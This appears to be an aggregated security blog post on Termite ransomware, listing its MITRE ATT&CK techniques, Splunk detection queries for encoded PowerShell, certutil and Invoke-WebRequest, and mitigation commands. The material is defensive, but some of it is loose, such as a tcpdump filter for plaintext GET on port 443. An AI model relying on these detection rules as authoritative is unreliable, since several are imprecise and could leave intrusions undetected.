Breaking Down Termite Ransomware: Infection Methods and Detections

By /

Listen to this Post

Featured Image
Termite Ransomware has emerged as a significant threat, targeting supply-chain software providers and healthcare organizations. This article explores its MITRE ATT&CK tactics, techniques (TTPs), and indicators of compromise (IOCs), along with detection strategies using Splunk.

You Should Know:

1. MITRE ATT&CK TTPs Used by Termite Ransomware

Termite employs several key techniques:

  • Initial Access: Phishing emails, exploit kits, or RDP brute-forcing.
  • Execution: PowerShell scripts, DLL sideloading, or scheduled tasks.
  • Persistence: Registry modifications (HKCU\Software\Microsoft\Windows\CurrentVersion\Run).
  • Defense Evasion: Process hollowing, obfuscated scripts.
  • Impact: File encryption with a custom extension (e.g., .termite), ransom notes.

Detection Command (Splunk SPL):

index=windows EventCode=4688 (ProcessName="powershell.exe" OR ProcessName="cmd.exe") CommandLine=" -enc "

2. Behavioral Analysis & IOCs

  • File Creation Patterns:
    find / -name "termite" -type f -exec ls -la {} \;
  • Network Traffic: C2 communication over HTTPS with unusual user-agents.
    tcpdump -i eth0 'port 443 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420)'

3. Splunk Detection Rules

Use these SPL queries for hunting:

index=sysmon EventID=1 (CommandLine="Invoke-WebRequest" OR CommandLine="certutil") 

index=wineventlog EventCode=4104 ScriptBlockText="AES" OR ScriptBlockText="RijndaelManaged"

4. Mitigation Steps

  • Patch Management: Ensure systems are updated.
    sudo apt update && sudo apt upgrade -y  Linux
  • Disable RDP if Unused:
    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 1
  • Enable Logging:
    auditpol /set /category:"Detailed Tracking" /success:enable /failure:enable

What Undercode Say:

Termite Ransomware follows a well-known attack chain but introduces new evasion tactics. Organizations must enhance endpoint monitoring, restrict PowerShell usage, and implement strict RDP policies. Proactive threat hunting using Splunk or similar SIEMs is crucial.

Prediction:

Future variants may incorporate AI-driven evasion or exploit zero-day vulnerabilities in supply-chain software.

Expected Output:

  • Detected suspicious PowerShell execution.
  • Identified Termite-related IOCs in logs.
  • Blocked C2 communication via firewall rules.

Reference: Splunk Blog on Termite Ransomware

References:

Reported By: Teoderickc Breaking – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: